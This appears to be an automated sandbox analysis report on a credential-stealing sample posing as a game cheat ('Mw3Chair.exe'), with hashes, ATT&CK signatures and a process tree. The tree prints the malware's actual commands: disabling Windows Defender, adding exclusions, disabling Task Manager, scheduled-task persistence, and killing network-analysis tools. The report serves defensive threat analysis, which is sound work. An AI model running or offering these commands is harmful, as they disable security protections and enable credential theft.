f77744f36fab5f4abb3ae0cf2bfade543ec90472bcdef6508bddf38493fa6873

Analysis

max time kernel
46s
max time network
48s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15/09/2024, 01:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mw3Chair.exe
Size

93.8MB
MD5

2dfdda495ef398f421af9821ec5bd6fb
SHA1

7bc7a0716e47064842c2616a2fe1a5a6c4ebaf24
SHA256

f77744f36fab5f4abb3ae0cf2bfade543ec90472bcdef6508bddf38493fa6873
SHA512

1c2af9e84ef2cbe0949e02e3e62cb0a178c53e05260ba0887888e7ff78adcc13d60f0ac4b444a1d3733ef462249b96be17c04d211c08e5dcbd6d42fd5673e508
SSDEEP

1572864:509tMO8gn6D68Uzusf2nhqQVGNgV2UIsVHBfgxXW5snXOyi4oLmm0GTjuME7:pTgOizfeR6gV2Vy4xXW5sXOPAxMjuMW

Score

9^/10

credential_access defense_evasion discovery evasion execution privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4564	powershell.exe
3484	powershell.exe
2708	powershell.exe
3440	powershell.exe
2740	powershell.exe
3432	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	rr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	Mw3Chair.exe

Executes dropped EXE 5 IoCs

pid	Process
3636	rr.exe
3656	CORTEX.exe
1956	rr.exe
5076	rr.exe
3700	rr.exe

Loads dropped DLL 13 IoCs

pid	Process
3636	rr.exe
3636	rr.exe
3636	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
5076	rr.exe
3700	rr.exe
3700	rr.exe
3700	rr.exe
3700	rr.exe
3700	rr.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
58	raw.githubusercontent.com
60	raw.githubusercontent.com
64	raw.githubusercontent.com
151	raw.githubusercontent.com
54	raw.githubusercontent.com
57	raw.githubusercontent.com
59	raw.githubusercontent.com
133	raw.githubusercontent.com
55	raw.githubusercontent.com
56	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
51	ipinfo.io
52	ipinfo.io

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4904	sc.exe
680	sc.exe
2900	sc.exe
1236	sc.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3908	cmd.exe
2708	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rr.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	rr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	rr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	rr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	rr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	rr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1548	WMIC.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
2528	taskkill.exe
4376	taskkill.exe
1692	taskkill.exe
4756	taskkill.exe
2716	taskkill.exe
2804	taskkill.exe
3140	taskkill.exe
540	taskkill.exe
4900	taskkill.exe
2992	taskkill.exe
2472	taskkill.exe
3388	taskkill.exe
4608	taskkill.exe
4588	taskkill.exe
1516	taskkill.exe
4000	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3656	CORTEX.exe
3656	CORTEX.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
3096	powershell.exe
3096	powershell.exe
3096	powershell.exe
1888	powershell.exe
1888	powershell.exe
1888	powershell.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe
1956	rr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3636	rr.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	4000	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	2528	taskkill.exe
Token: SeDebugPrivilege	2992	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	3388	taskkill.exe
Token: SeDebugPrivilege	4756	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	2804	taskkill.exe
Token: SeDebugPrivilege	3140	taskkill.exe
Token: SeDebugPrivilege	4608	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2080	WMIC.exe
Token: SeSecurityPrivilege	2080	WMIC.exe
Token: SeTakeOwnershipPrivilege	2080	WMIC.exe
Token: SeLoadDriverPrivilege	2080	WMIC.exe
Token: SeSystemProfilePrivilege	2080	WMIC.exe
Token: SeSystemtimePrivilege	2080	WMIC.exe
Token: SeProfSingleProcessPrivilege	2080	WMIC.exe
Token: SeIncBasePriorityPrivilege	2080	WMIC.exe
Token: SeCreatePagefilePrivilege	2080	WMIC.exe
Token: SeBackupPrivilege	2080	WMIC.exe
Token: SeRestorePrivilege	2080	WMIC.exe
Token: SeShutdownPrivilege	2080	WMIC.exe
Token: SeDebugPrivilege	2080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2080	WMIC.exe
Token: SeRemoteShutdownPrivilege	2080	WMIC.exe
Token: SeUndockPrivilege	2080	WMIC.exe
Token: SeManageVolumePrivilege	2080	WMIC.exe
Token: 33	2080	WMIC.exe
Token: 34	2080	WMIC.exe
Token: 35	2080	WMIC.exe
Token: 36	2080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2080	WMIC.exe
Token: SeSecurityPrivilege	2080	WMIC.exe
Token: SeTakeOwnershipPrivilege	2080	WMIC.exe
Token: SeLoadDriverPrivilege	2080	WMIC.exe
Token: SeSystemProfilePrivilege	2080	WMIC.exe
Token: SeSystemtimePrivilege	2080	WMIC.exe
Token: SeProfSingleProcessPrivilege	2080	WMIC.exe
Token: SeIncBasePriorityPrivilege	2080	WMIC.exe
Token: SeCreatePagefilePrivilege	2080	WMIC.exe
Token: SeBackupPrivilege	2080	WMIC.exe
Token: SeRestorePrivilege	2080	WMIC.exe
Token: SeShutdownPrivilege	2080	WMIC.exe
Token: SeDebugPrivilege	2080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2080	WMIC.exe
Token: SeRemoteShutdownPrivilege	2080	WMIC.exe
Token: SeUndockPrivilege	2080	WMIC.exe
Token: SeManageVolumePrivilege	2080	WMIC.exe
Token: 33	2080	WMIC.exe
Token: 34	2080	WMIC.exe
Token: 35	2080	WMIC.exe
Token: 36	2080	WMIC.exe
Token: SeShutdownPrivilege	1956	rr.exe
Token: SeCreatePagefilePrivilege	1956	rr.exe
Token: SeShutdownPrivilege	1956	rr.exe
Token: SeCreatePagefilePrivilege	1956	rr.exe
Token: SeShutdownPrivilege	1956	rr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3624 wrote to memory of 3636	3624	Mw3Chair.exe	88
PID 3624 wrote to memory of 3636	3624	Mw3Chair.exe	88
PID 3624 wrote to memory of 3636	3624	Mw3Chair.exe	88
PID 3624 wrote to memory of 3656	3624	Mw3Chair.exe	91
PID 3624 wrote to memory of 3656	3624	Mw3Chair.exe	91
PID 3656 wrote to memory of 1896	3656	CORTEX.exe	95
PID 3656 wrote to memory of 1896	3656	CORTEX.exe	95
PID 3656 wrote to memory of 2264	3656	CORTEX.exe	96
PID 3656 wrote to memory of 2264	3656	CORTEX.exe	96
PID 3656 wrote to memory of 1768	3656	CORTEX.exe	97
PID 3656 wrote to memory of 1768	3656	CORTEX.exe	97
PID 3656 wrote to memory of 2104	3656	CORTEX.exe	98
PID 3656 wrote to memory of 2104	3656	CORTEX.exe	98
PID 3656 wrote to memory of 736	3656	CORTEX.exe	99
PID 3656 wrote to memory of 736	3656	CORTEX.exe	99
PID 3656 wrote to memory of 3092	3656	CORTEX.exe	100
PID 3656 wrote to memory of 3092	3656	CORTEX.exe	100
PID 3656 wrote to memory of 116	3656	CORTEX.exe	101
PID 3656 wrote to memory of 116	3656	CORTEX.exe	101
PID 3656 wrote to memory of 3168	3656	CORTEX.exe	102
PID 3656 wrote to memory of 3168	3656	CORTEX.exe	102
PID 2104 wrote to memory of 4588	2104	cmd.exe	103
PID 2104 wrote to memory of 4588	2104	cmd.exe	103
PID 3168 wrote to memory of 4716	3168	cmd.exe	105
PID 3168 wrote to memory of 4716	3168	cmd.exe	105
PID 3092 wrote to memory of 2716	3092	cmd.exe	104
PID 3092 wrote to memory of 2716	3092	cmd.exe	104
PID 1768 wrote to memory of 4000	1768	cmd.exe	106
PID 1768 wrote to memory of 4000	1768	cmd.exe	106
PID 736 wrote to memory of 680	736	cmd.exe	107
PID 736 wrote to memory of 680	736	cmd.exe	107
PID 3656 wrote to memory of 4284	3656	CORTEX.exe	108
PID 3656 wrote to memory of 4284	3656	CORTEX.exe	108
PID 3656 wrote to memory of 1728	3656	CORTEX.exe	109
PID 3656 wrote to memory of 1728	3656	CORTEX.exe	109
PID 3656 wrote to memory of 4316	3656	CORTEX.exe	110
PID 3656 wrote to memory of 4316	3656	CORTEX.exe	110
PID 3656 wrote to memory of 4496	3656	CORTEX.exe	111
PID 3656 wrote to memory of 4496	3656	CORTEX.exe	111
PID 3656 wrote to memory of 3068	3656	CORTEX.exe	112
PID 3656 wrote to memory of 3068	3656	CORTEX.exe	112
PID 3656 wrote to memory of 4952	3656	CORTEX.exe	113
PID 3656 wrote to memory of 4952	3656	CORTEX.exe	113
PID 2264 wrote to memory of 2528	2264	cmd.exe	114
PID 2264 wrote to memory of 2528	2264	cmd.exe	114
PID 3068 wrote to memory of 4900	3068	cmd.exe	115
PID 3068 wrote to memory of 4900	3068	cmd.exe	115
PID 4284 wrote to memory of 2992	4284	cmd.exe	116
PID 4284 wrote to memory of 2992	4284	cmd.exe	116
PID 4316 wrote to memory of 2472	4316	cmd.exe	117
PID 4316 wrote to memory of 2472	4316	cmd.exe	117
PID 4496 wrote to memory of 2900	4496	cmd.exe	118
PID 4496 wrote to memory of 2900	4496	cmd.exe	118
PID 1728 wrote to memory of 1516	1728	cmd.exe	119
PID 1728 wrote to memory of 1516	1728	cmd.exe	119
PID 3656 wrote to memory of 3832	3656	CORTEX.exe	120
PID 3656 wrote to memory of 3832	3656	CORTEX.exe	120
PID 3656 wrote to memory of 1548	3656	CORTEX.exe	121
PID 3656 wrote to memory of 1548	3656	CORTEX.exe	121
PID 3656 wrote to memory of 4768	3656	CORTEX.exe	122
PID 3656 wrote to memory of 4768	3656	CORTEX.exe	122
PID 3656 wrote to memory of 836	3656	CORTEX.exe	123
PID 3656 wrote to memory of 836	3656	CORTEX.exe	123
PID 3656 wrote to memory of 560	3656	CORTEX.exe	124

C:\Users\Admin\AppData\Local\Temp\Mw3Chair.exe
"C:\Users\Admin\AppData\Local\Temp\Mw3Chair.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3624
- C:\Users\Admin\AppData\Roaming\rr.exe
  "C:\Users\Admin\AppData\Roaming\rr.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3636
- - C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe
    C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3636 get ExecutablePath"
      4⤵
      PID:736
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where processid=3636 get ExecutablePath
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe
      "C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\jornalearamos" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1960 --field-trial-handle=1964,i,14240717855928200053,2404954898776118390,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3700
  - - C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe
      "C:\Users\Admin\AppData\Local\Temp\2m5QK1WcLEvcRZNvUwDhvm0yekH\rr.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\jornalearamos" --mojo-platform-channel-handle=2436 --field-trial-handle=1964,i,14240717855928200053,2404954898776118390,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "net session"
      4⤵
      PID:3544
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:3804
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:5084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:3116
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
      4⤵
      PID:2152
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic OS get caption, osarchitecture
        5⤵
        
        PID:2168
    - - C:\Windows\system32\more.com
        
        more +1
        5⤵
        
        PID:4364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
      4⤵
      PID:3556
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        5⤵
        
        PID:3832
    - - C:\Windows\system32\more.com
        
        more +1
        5⤵
        
        PID:3608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
      4⤵
      PID:1364
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1548
    - - C:\Windows\system32\more.com
        
        more +1
        5⤵
        
        PID:3940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:2796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
      4⤵
      PID:5044
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3636 get ExecutablePath"
      4⤵
      PID:3952
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where processid=3636 get ExecutablePath
        5⤵
        
        PID:928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
      4⤵
      PID:3016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\rr.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
      4⤵
      PID:392
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "mullvad account logout"
      4⤵
      PID:4364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
      4⤵
      PID:1392
    - - C:\Windows\system32\reg.exe
        
        C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:2836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
      4⤵
      PID:628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2740
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutbVky1.ps1" -RunAsAdministrator"
      4⤵
      Access Token Manipulation: Create Process with Token
      PID:3908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutbVky1.ps1" -RunAsAdministrator
        5⤵
        Command and Scripting Interpreter: PowerShell
        Access Token Manipulation: Create Process with Token
        
        PID:2708
- C:\Users\Admin\AppData\Roaming\CORTEX.exe
  "C:\Users\Admin\AppData\Roaming\CORTEX.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 4
    3⤵
    PID:1896
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2528
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4000
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2104
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4588
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:736
  - - C:\Windows\system32\sc.exe
      sc stop HTTPDebuggerPro
      4⤵
      Launches sc.exe
      PID:680
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3092
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM HTTPDebuggerSvc.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2716
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
    3⤵
    PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Roaming\CORTEX.exe" MD5
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3168
  - - C:\Windows\system32\certutil.exe
      certutil -hashfile "C:\Users\Admin\AppData\Roaming\CORTEX.exe" MD5
      4⤵
      PID:4716
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4284
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2992
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1728
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1516
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2472
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\system32\sc.exe
      sc stop HTTPDebuggerPro
      4⤵
      Launches sc.exe
      PID:2900
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM HTTPDebuggerSvc.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4900
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
    3⤵
    PID:4952
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
    3⤵
    PID:3832
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:540
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1548
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1692
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:4768
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3140
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
    3⤵
    PID:836
